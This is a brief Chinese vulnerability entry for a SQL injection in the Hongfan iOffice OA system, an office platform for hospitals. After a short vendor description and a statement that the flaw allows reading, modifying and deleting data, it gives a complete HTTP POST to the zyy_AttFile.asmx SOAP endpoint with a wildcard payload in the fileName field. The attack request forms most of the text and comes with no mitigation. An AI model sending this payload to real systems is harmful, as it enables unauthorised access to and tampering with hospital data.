漏洞描述
红帆科技深耕医疗行业21年,专注医疗行政办公管理,经过了多年的经验积累,oa办公系统、bpm,移动oa,流程管理等系统在实际应用中得到了良好的印证。红帆OA系统存在sql注入漏洞:获取数据、修改数据、删除数据等
POST /iOffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
Host:
Content-Type: text/xml
Content-Length: 388
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetFileAtt
xmlns="http://tempuri.org/">
<fileName>%</fileName>
</GetFileAtt>
</soap:Body>
</soap:Envelope>